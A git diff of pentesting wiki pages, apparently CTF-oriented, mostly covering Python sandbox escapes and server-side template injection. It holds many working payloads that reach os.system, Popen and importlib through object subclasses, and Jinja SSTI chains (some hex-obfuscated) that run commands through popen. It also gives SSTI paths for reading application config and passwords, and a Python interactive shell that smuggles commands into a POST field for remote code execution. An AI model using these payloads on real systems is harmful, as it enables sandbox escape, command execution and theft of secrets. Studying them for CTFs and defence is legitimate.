+().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]["eval"]("__import__('os').system('ls')") + +# Or you could obtain the builtins from a defined function +get_flag.__globals__['__builtins__']['__import__']("os").system("ls") +``` + +#### Python3 + +```python +# Obtain the builtins from a defined function +get_flag.__globals__['__builtins__'].__import__("os").system("ls") + + +# The os._wrap_close class is usually loaded. Its scope gives direct access to os package (as well as __builtins__) +[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls') +[ x for x in ''.__class__.__base__.__subclasses__() if x.__name__ == 'Popen' ][0]('ls') +[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'subprocess." in str(x) ][0]['Popen']('ls') +[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'_sitebuiltins." in str(x) and not "_Helper" in str(x) ][0]["sys"].modules["os"].system("ls") +[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].import_module("os").system("ls") +[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].__import__("os").system("ls") +``` + +#### Python2 and Python3 + +```python +# Recover __builtins__ and make eveything easier +__builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__) +__builtins__["__import__"]('os').system('ls') +``` + +### Discovering loaded variables + +Checking the **`globals`** and **`locals`** is a good way to know what you can access. + +```python +>>> globals() +{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': , '__spec__': None, '__annotations__': {}, '__builtins__': , 'attr': , 'a': , 'b': , 'c': , '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', , 1): True}, 'z': } +>>> locals() +{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': , '__spec__': None, '__annotations__': {}, '__builtins__': , 'attr': , 'a': , 'b': , 'c': , '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', , 1): True}, 'z': } +``` + +### Discovering more loaded methods for arbitrary execution + +Here I want to explain how to easily discover **more dangerous functionalities loaded** and propose more reliable exploits. + +#### Accessing subclasses with bypasses + +One of the most sensitive parts of this technique is to be able to **access the base subclasses**. In the previous examples this was done using `''.__class__.__base__.__subclasses__()` but there are **other possible ways**: + +```python +#You can access the base from mostly anywhere (in regular conditions) +[].__class__.__base__.__subclasses__() +{}.__class__.__base__.__subclasses__() +().__class__.__base__.__subclasses__() +bool.__class__.__base__.__subclasses__() + +#You can also access it without "__base__" or "__class__" + ## You can apply the previous technique also here +"".__class__.__bases__[0].__subclasses__() +"".__class__.__mro__[1].__subclasses__() +"".__getattribute__("__class__").mro()[1].__subclasses__() +"".__getattribute__("__class__").__base__.__subclasses__() + +#If attr is present you can access everything as string +## This is common in Djanjo (and Jinja) environments +(''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(132)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen'))('cat+flag.txt').read() +(''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read() +``` + +#### Finding dangerous libraries loaded + +For example, knowing that with the library **`sys`** it's possible to **import arbitrary libraries**, you can search for all the **modules loaded that have imported sys inside of them**: + +```python +[ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ] +['_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'FileLoader', '_NamespacePath', '_NamespaceLoader', 'FileFinder', 'zipimporter', '_ZipImportResourceReader', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_wrap_close', 'Quitter', '_Printer', 'WarningMessage', 'catch_warnings', '_GeneratorContextManagerBase', '_BaseExitStack', 'Untokenizer', 'FrameSummary', 'TracebackException', 'CompletedProcess', 'Popen', 'finalize', 'NullImporter', '_HackedGetData', '_localized_month', '_localized_day', 'Calendar', 'different_locale', 'SSLObject', 'Request', 'OpenerDirector', 'HTTPPasswordMgr', 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'URLopener', '_PaddedFile', 'CompressedValue', 'LogRecord', 'PercentStyle', 'Formatter', 'BufferingFormatter', 'Filter', 'Filterer', 'PlaceHolder', 'Manager', 'LoggerAdapter', '_LazyDescr', '_SixMetaPathImporter', 'MimeTypes', 'ConnectionPool', '_LazyDescr', '_SixMetaPathImporter', 'Bytecode', 'BlockFinder', 'Parameter', 'BoundArguments', 'Signature', '_DeprecatedValue', '_ModuleWithDeprecations', 'Scrypt', 'WrappedSocket', 'PyOpenSSLContext', 'ZipInfo', 'LZMACompressor', 'LZMADecompressor', '_SharedFile', '_Tellable', 'ZipFile', 'Path', '_Flavour', '_Selector', 'JSONDecoder', 'Response', 'monkeypatch', 'InstallProgress', 'TextProgress', 'BaseDependency', 'Origin', 'Version', 'Package', '_Framer', '_Unframer', '_Pickler', '_Unpickler', 'NullTranslations'] +``` + +There are a lot, and we just need one to execute commands: + +```python +[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls") +``` + +We can do the same thing with **other libraries** that we know can be used to execute commands: + +```python +#os +[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" in x.__init__.__globals__ ][0]["os"].system("ls") +#commands (not very common) +[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "commands" in x.__init__.__globals__ ][0]["commands"].getoutput("ls") +#subprocess +[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "subprocess" in x.__init__.__globals__ ][0]["subprocess"].Popen("ls") +#pty (not very common) +[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pty" in x.__init__.__globals__ ][0]["pty"].spawn("ls") +#importlib +[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].import_module("os").system("ls") +[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].__import__("os").system("ls") +#sys +[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls") +#builtins +[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"].__import__("os").system("ls") +``` + +Moreover, we could even search which modules are loading malicious libraries: + +```python +bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip"] +for b in bad_libraries_names: + vuln_libs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and b in x.__init__.__globals__ ] + print(f"{b}: {', '.join(vuln_libs)}") + +""" +os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations +commands: +subprocess: BaseDependency, Origin, Version, Package +pty: +importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path +imp: +sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close +builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature +""" +``` + +Moreover, if you think **other libraries** may be able to **invoke functions to execute commands**, we can also **filter by functions names** inside the possible libraries: + +```python +bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip"] +bad_func_names = ["system", "popen", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__"] +for b in bad_libraries_names + bad_func_names: + vuln_funcs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) for k in x.__init__.__globals__ if k == b ] + print(f"{b}: {', '.join(vuln_funcs)}") + +""" +os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations +commands: +subprocess: BaseDependency, Origin, Version, Package +pty: +importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path +imp: +sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close +builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature +pip: +system: _wrap_close, _wrap_close +getstatusoutput: CompletedProcess, Popen +getoutput: CompletedProcess, Popen +call: CompletedProcess, Popen +Popen: CompletedProcess, Popen +spawn: +import_module: +__import__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec +load_source: NullImporter, _HackedGetData +execfile: +execute: +__builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, DynamicClassAttribute, _GeneratorWrapper, WarningMessage, catch_warnings, Repr, partialmethod, singledispatchmethod, cached_property, _GeneratorContextManagerBase, _BaseExitStack, Completer, State, SubPattern, Tokenizer, Scanner, Untokenizer, FrameSummary, TracebackException, _IterationGuard, WeakSet, _RLock, Condition, Semaphore, Event, Barrier, Thread, CompletedProcess, Popen, finalize, _TemporaryFileCloser, _TemporaryFileWrapper, SpooledTemporaryFile, TemporaryDirectory, NullImporter, _HackedGetData, DOMBuilder, DOMInputSource, NamedNodeMap, TypeInfo, ReadOnlySequentialNamedNodeMap, ElementInfo, Template, Charset, Header, _ValueFormatter, _localized_month, _localized_day, Calendar, different_locale, AddrlistClass, _PolicyBase, BufferedSubFile, FeedParser, Parser, BytesParser, Message, HTTPConnection, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, Address, Group, HeaderRegistry, ContentManager, CompressedValue, _Feature, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, Queue, _PySimpleQueue, HMAC, Timeout, Retry, HTTPConnection, MimeTypes, RequestField, RequestMethods, DeflateDecoder, GzipDecoder, MultiDecoder, ConnectionPool, CharSetProber, CodingStateMachine, CharDistributionAnalysis, JapaneseContextAnalysis, UniversalDetector, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, DSAParameterNumbers, DSAPublicNumbers, DSAPrivateNumbers, ObjectIdentifier, ECDSA, EllipticCurvePublicNumbers, EllipticCurvePrivateNumbers, RSAPrivateNumbers, RSAPublicNumbers, DERReader, BestAvailableEncryption, CBC, XTS, OFB, CFB, CFB8, CTR, GCM, Cipher, _CipherContext, _AEADCipherContext, AES, Camellia, TripleDES, Blowfish, CAST5, ARC4, IDEA, SEED, ChaCha20, _FragList, _SSHFormatECDSA, Hash, SHAKE128, SHAKE256, BLAKE2b, BLAKE2s, NameAttribute, RelativeDistinguishedName, Name, RFC822Name, DNSName, UniformResourceIdentifier, DirectoryName, RegisteredID, IPAddress, OtherName, Extensions, CRLNumber, AuthorityKeyIdentifier, SubjectKeyIdentifier, AuthorityInformationAccess, SubjectInformationAccess, AccessDescription, BasicConstraints, DeltaCRLIndicator, CRLDistributionPoints, FreshestCRL, DistributionPoint, PolicyConstraints, CertificatePolicies, PolicyInformation, UserNotice, NoticeReference, ExtendedKeyUsage, TLSFeature, InhibitAnyPolicy, KeyUsage, NameConstraints, Extension, GeneralNames, SubjectAlternativeName, IssuerAlternativeName, CertificateIssuer, CRLReason, InvalidityDate, PrecertificateSignedCertificateTimestamps, SignedCertificateTimestamps, OCSPNonce, IssuingDistributionPoint, UnrecognizedExtension, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _OpenSSLError, Binding, _X509NameInvalidator, PKey, _EllipticCurve, X509Name, X509Extension, X509Req, X509, X509Store, X509StoreContext, Revoked, CRL, PKCS12, NetscapeSPKI, _PassphraseHelper, _CallbackExceptionHelper, Context, Connection, _CipherContext, _CMACContext, _X509ExtensionParser, DHPrivateNumbers, DHPublicNumbers, DHParameterNumbers, _DHParameters, _DHPrivateKey, _DHPublicKey, Prehashed, _DSAVerificationContext, _DSASignatureContext, _DSAParameters, _DSAPrivateKey, _DSAPublicKey, _ECDSASignatureContext, _ECDSAVerificationContext, _EllipticCurvePrivateKey, _EllipticCurvePublicKey, _Ed25519PublicKey, _Ed25519PrivateKey, _Ed448PublicKey, _Ed448PrivateKey, _HashContext, _HMACContext, _Certificate, _RevokedCertificate, _CertificateRevocationList, _CertificateSigningRequest, _SignedCertificateTimestamp, OCSPRequestBuilder, _SingleResponse, OCSPResponseBuilder, _OCSPResponse, _OCSPRequest, _Poly1305Context, PSS, OAEP, MGF1, _RSASignatureContext, _RSAVerificationContext, _RSAPrivateKey, _RSAPublicKey, _X25519PublicKey, _X25519PrivateKey, _X448PublicKey, _X448PrivateKey, Scrypt, PKCS7SignatureBuilder, Backend, GetCipherByName, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, RawJSON, JSONDecoder, JSONEncoder, Cookie, CookieJar, MockRequest, MockResponse, Response, BaseAdapter, UnixHTTPConnection, monkeypatch, JSONDecoder, JSONEncoder, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close +""" +``` + +## Dissecting functions + +In some CTFs you could be provided the name of a custom function where the flag resides and you need to see the internals of the function to extract it. + +This is the function to inspect: + +```python +def get_flag(some_input): + var1=1 + var2="secretcode" + var3=["some","array"] + if some_input == var2: + return "THIS-IS-THE-FALG!" + else: + return "Nope" +``` + +#### dir + +```python +dir() #General dir() to find what we have loaded +['__builtins__', '__doc__', '__name__', '__package__', 'b', 'bytecode', 'code', 'codeobj', 'consts', 'dis', 'filename', 'foo', 'get_flag', 'names', 'read', 'x'] +dir(get_flag) #Get info tof the function +['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name'] +``` + +#### globals + +`__globals__` and `func_globals`\(Same\) Obtains the global environment. In the example you can see some imported modules, some global variables and their content declared: + +```python +get_flag.func_globals +get_flag.__globals__ +{'b': 3, 'names': ('open', 'read'), '__builtins__': , 'codeobj': at 0x7f58c00b26b0, file "noname", line 1>, 'get_flag': , 'filename': './poc.py', '__package__': None, 'read': , 'code': , 'bytecode': 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S', 'consts': (None, './poc.py', 'r'), 'x': , '__name__': '__main__', 'foo': , '__doc__': None, 'dis': } + +#If you have access to some variable value +CustomClassObject.__class__.__init__.__globals__ +``` + +`__code__` and `func_code`: You can access this to obtain some internal data of the function + +```python +#Get the options +dir(get_flag.func_code) +['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames'] +#Get internal varnames +get_flag.func_code.co_varnames +('some_input', 'var1', 'var2', 'var3') +#Get the value of the vars +get_flag.func_code.co_consts +(None, 1, 'secretcode', 'some', 'array', 'THIS-IS-THE-FALG!', 'Nope') +#Get bytecode +get_flag.func_code.co_code +'d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S' +``` + +**Disassembly a function** + +```python +import dis +dis.dis(get_flag) + 2 0 LOAD_CONST 1 (1) + 3 STORE_FAST 1 (var1) + + 3 6 LOAD_CONST 2 ('secretcode') + 9 STORE_FAST 2 (var2) + + 4 12 LOAD_CONST 3 ('some') + 15 LOAD_CONST 4 ('array') + 18 BUILD_LIST 2 + 21 STORE_FAST 3 (var3) + + 5 24 LOAD_FAST 0 (some_input) + 27 LOAD_FAST 2 (var2) + 30 COMPARE_OP 2 (==) + 33 POP_JUMP_IF_FALSE 40 + + 6 36 LOAD_CONST 5 ('THIS-IS-THE-FALG!') + 39 RETURN_VALUE + + 8 >> 40 LOAD_CONST 6 ('Nope') + 43 RETURN_VALUE + 44 LOAD_CONST 0 (None) + 47 RETURN_VALUE +``` + +Notice that **if you cannot import `dis` in the python sandbox** you can obtain the **bytecode** of the function \(`get_flag.func_code.co_code`\) and **disassemble** it locally. You won't see the content of the variables being loaded \(`LOAD_CONST`\) but you can guess them from \(`get_flag.func_code.co_consts`\) because `LOAD_CONST`also tells the offset of the variable being loaded. + +```python +dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S') + 0 LOAD_CONST 1 (1) + 3 STORE_FAST 1 (1) + 6 LOAD_CONST 2 (2) + 9 STORE_FAST 2 (2) + 12 LOAD_CONST 3 (3) + 15 LOAD_CONST 4 (4) + 18 BUILD_LIST 2 + 21 STORE_FAST 3 (3) + 24 LOAD_FAST 0 (0) + 27 LOAD_FAST 2 (2) + 30 COMPARE_OP 2 (==) + 33 POP_JUMP_IF_FALSE 40 + 36 LOAD_CONST 5 (5) + 39 RETURN_VALUE + >> 40 LOAD_CONST 6 (6) + 43 RETURN_VALUE + 44 LOAD_CONST 0 (0) + 47 RETURN_VALUE +``` + +## References + +* [https://lbarman.ch/blog/pyjail/](https://lbarman.ch/blog/pyjail/) +* [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/) +* [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/) +* [https://gynvael.coldwind.pl/n/python\_sandbox\_escape](https://gynvael.coldwind.pl/n/python_sandbox_escape) +* [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html) + +\*\*\*\* + diff --git a/misc/basic-python/magic-methods.md b/misc/basic-python/magic-methods.md new file mode 100644 index 00000000000..5b3108f3ece --- /dev/null +++ b/misc/basic-python/magic-methods.md @@ -0,0 +1,59 @@ +# Magic Methods + +## Class Methods + +You can access the **methods** of a **class** using **\_\_dict\_\_.** + +![](../../.gitbook/assets/image%20%28275%29.png) + +You can access the functions + +![](../../.gitbook/assets/image%20%28285%29.png) + +## Object class + +### **Attributes** + +You can access the **attributes of an object** using **\_\_dict\_\_**. Example: + +![](../../.gitbook/assets/image%20%28146%29.png) + +### Class + +You can access the **class** of an object using **\_\_class\_\_** + +![](../../.gitbook/assets/image%20%28221%29.png) + +You can access the **methods** of the **class** of an **object chainning** magic functions: + +![](../../.gitbook/assets/image%20%28114%29.png) + +## Server Side Template Injection + +Interesting functions to exploit this vulnerability + +```text +__init__.__globals__ +__class__.__init__.__globals__ +``` + +Inside the response search for the application \(probably at the end?\) + +Then **access the environment content** of the application where you will hopefully find **some passwords** of interesting information: + +```text +__init__.__globals__[].config +__init__.__globals__[].__dict__ +__init__.__globals__[].__dict__.config +__class__.__init__.__globals__[].config +__class__.__init__.__globals__[].__dict__ +__class__.__init__.__globals__[].__dict__.config +``` + +## More Information + +* [https://rushter.com/blog/python-class-internals/](https://rushter.com/blog/python-class-internals/) +* [https://docs.python.org/3/reference/datamodel.html](https://docs.python.org/3/reference/datamodel.html) +* [https://balsn.tw/ctf\_writeup/20190603-facebookctf/\#events](https://balsn.tw/ctf_writeup/20190603-facebookctf/#events) +* [https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0](https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0) \(events\) + diff --git a/src/generic-methodologies-and-resources/python/venv.md b/misc/basic-python/venv.md similarity index 81% rename from src/generic-methodologies-and-resources/python/venv.md rename to misc/basic-python/venv.md index 572bdfbf74d..e417fc808ca 100644 --- a/src/generic-methodologies-and-resources/python/venv.md +++ b/misc/basic-python/venv.md @@ -1,13 +1,10 @@ # venv -{{#include ../../banners/hacktricks-training.md}} - - ```bash sudo apt-get install python3-venv #Now, go to the folder you want to create the virtual environment python3 -m venv -python3 -m venv pvenv #In this case the folder "pvenv" is going to be created +python3 -m venv pvenv #In this case the folder "pvenv" is going to be crated source /bin/activate source pvenv/bin/activate #Activate the environment #You can now install whatever python library you need @@ -22,7 +19,3 @@ pip3 install wheel inside the virtual environment ``` -{{#include ../../banners/hacktricks-training.md}} - - - diff --git a/misc/basic-python/web-requests.md b/misc/basic-python/web-requests.md new file mode 100644 index 00000000000..aa1b858d9eb --- /dev/null +++ b/misc/basic-python/web-requests.md @@ -0,0 +1,70 @@ +--- +description: 'Get request, Post request (regular, json, file)' +--- + +# Web Requests + +```python +import requests + +url = "http://example.com:80/some/path.php" +params = {"p1":"value1", "p2":"value2"} +headers = {"User-Agent": "fake User Agent", "Fake header": "True value"} +cookies = {"PHPSESSID": "1234567890abcdef", "FakeCookie123": "456"} +proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} + +#Regular Get requests sending parameters (params) +gr = requests.get(url, params=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True) + +code = gr.status_code +ret_headers = gr.headers +body_byte = gr.content +body_text = gr.text +ret_cookies = gr.cookies +is_redirect = gr.is_redirect +is_permanent_redirect = gr.is_permanent_redirect +float_seconds = gr.elapsed.total_seconds() 10.231 + +#Regular Post requests sending parameters (data) +pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies) + +#Json Post requests sending parameters(json) +pr = requests.post(url, json=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies) + +#Post request sending a file(files) and extra values +filedict = {"" : ("filename.png", open("filename.png", 'rb').read(), "image/png")} +pr = requests.post(url, data={"submit": "submit"}, files=filedict) + +#Useful for presenting results in boolean/timebased injections +print(f"\rflag: {flag}{char}", end="") +``` + +## Python cmd to exploit a RCE + +```python +import requests +import re +from cmd import Cmd + +class Terminal(Cmd): + prompt = "Inject => " + + def default(self, args): + output = RunCmd(args) + print(output) + +def RunCmd(cmd): + data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' } + r = requests.post('http://10.10.10.127/select', data=data) + page = r.text + m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL) + if m: + return m.group(1) + else: + return 1 + + +term = Terminal() +term.cmdloop() +``` + diff --git a/misc/references.md b/misc/references.md new file mode 100644 index 00000000000..1e307ff2448 --- /dev/null +++ b/misc/references.md @@ -0,0 +1,22 @@ +# Other Big References + +{% embed url="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/\#python-tty-shell-trick" %} + +{% embed url="https://hausec.com/pentesting-cheatsheet/\#\_Toc475368982" %} + +{% embed url="https://anhtai.me/pentesting-cheatsheet/" %} + +{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %} + +{% embed url="https://ired.team/offensive-security-experiments/offensive-security-cheetsheets" %} + +{% embed url="http://www.lifeoverpentest.com/2018/02/enumeration-cheat-sheet-for-windows.html" %} + +{% embed url="https://chryzsh.gitbooks.io/pentestbook/basics\_of\_windows.html" %} + +{% embed url="https://github.com/wwong99/pentest-notes/blob/master/oscp\_resources/OSCP-Survival-Guide.md" %} + +{% 